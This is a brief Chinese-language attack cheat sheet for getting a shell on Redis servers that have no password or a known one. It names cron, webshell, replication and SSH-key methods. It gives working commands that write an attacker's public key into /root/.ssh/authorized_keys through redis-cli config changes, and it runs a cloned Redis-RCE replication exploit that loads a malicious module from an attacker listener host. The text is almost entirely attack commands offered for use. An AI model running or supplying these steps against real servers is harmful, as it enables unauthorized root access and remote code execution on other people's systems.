redis 未授权/知道密码 下getshell

常用的方法，计划任务，写webshell,主从复制，写公钥文件（会覆盖）

1 写公钥文件

ssh-****** –t rsa

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt

cat test.txt |redis-cli -h 192.168.0.109 -a 123456 -x set crackit

redis-cli -h 192.168.0.109 -a 123456

config set dir /root/.ssh/

config get dir

config set dbfilename "authorized_keys"

SAVE

ssh -i id_rsa root@192.168.0.109

 2 主从复制

  影响范围：Redis 4.x/5.x

 git clone https://github.com/jas502n/Redis-RCE.git

 python redis-rce.py -r 192.168.0.109 -p 6379 -L 192.168.0.107 -f exp_lin.so -a 123456